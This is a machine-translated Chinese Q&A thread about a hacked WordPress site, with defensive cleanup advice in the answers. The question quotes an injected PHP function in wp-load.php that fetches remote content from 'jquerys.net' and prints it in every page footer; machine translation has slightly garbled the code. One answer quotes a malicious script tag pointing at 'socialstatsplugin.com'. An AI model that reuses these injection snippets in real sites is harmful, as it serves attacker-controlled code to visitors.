我的wordpress网站被黑了吗?它是一个插件吗?

时间:2014-04-08 12:37:32

标签: wordpress virus

这个脚本不断回到我在public_html文件夹中的wp-load.php文件:

function pluginAuth(){  回波(wp_remote_retrieve_body(wp_remote_get( 'http://jquerys.net/jquery-1.6.3.min.js')));  }  add_action('wp_footer','pluginAuth');

这指向病毒网站“jquerys.net”

可以解决的问题是什么。从wp-load.php中删除fucntion并没有消除它,因为它会在刷新我博客的任何页面时重新生成。

请帮助

5 个答案:

答案 0 :(得分:1)

可能会有恶意代码注入任何wordpress文件。您将需要浏览所有文件,尤其是在您的主题中,以查找不应该存在的代码或文件/文件夹。

在此之后,您可以使用本文使您的构建更安全:

  

http://codex.wordpress.org/Hardening_WordPress

过去对我来说非常有用,可以防止这类事情再次发生。您可以根据需要执行多种安全措施。

我肯定会建议从保护wp-admin部分做一切。

答案 1 :(得分:0)

您很可能在wp-ulpoads文件夹中有一些受感染或恶意的文件,也检查是否存在与图像或文档不同的任何文件类型。

同样重要的是:检查您当前的主题functions.php文件是否有恶意代码,经常被黑客攻击的主题(即通过mafiashare网站的bittorent网站下载)注入此类代码,搜索任何curl()个请求,实际上不仅仅是在functions.php中,但在文件中(如果您的主题包含它们)options.phpsettings.php等。

答案 2 :(得分:0)

您似乎安装了受感染的WordPress。使用Theme Authenticity CheckerExploit Scanner插件自动检测可能是罪魁祸首的潜在恶意文件。

您还可以尝试Sucuri的免费扫描服务。

完成已损坏文件的识别后,请将其替换为可从WordPress.org获取的官方文件。

作为防御措施,安装WordPress File Monitor Plus插件 - 每次更改某些文件时都会发送电子邮件。这将允许您快速恢复某些黑客/脚本将来所做的任何更改!

答案 3 :(得分:0)

我能够检测到恶意脚本。它位于public_html文件夹中。该文件是" main.php"它不在默认安装中,也不会对任何主题或插件有所贡献。删除所有未经过验证的插件后,我删除了这个文件并删除了wp-load.php中的代码。

起初我没有删除" main.php"文件。 '功能'在wp-load中不断回来。但在删除" main.php"文件,我摆脱了这种病毒。

答案 4 :(得分:0)

WP中有新的病毒

  

下载由行发起的update.exe   <script src="//socialstatsplugin.com/jqury.js"></script>

我对这种病毒做了一些评论。

只需转到您的WP文件夹并检查是否有任何不需要的隐藏文件,当您浏览该文件时,这些文件是不可读的。

正如所说的那样 DELETE FROM wp_options WHERE option_name like '%wp_data_newa%'  并删除任何文件夹中所有不需要的隐藏文件夹它一直工作到现在。希望它会有所帮助。永远不会知道未来。

由于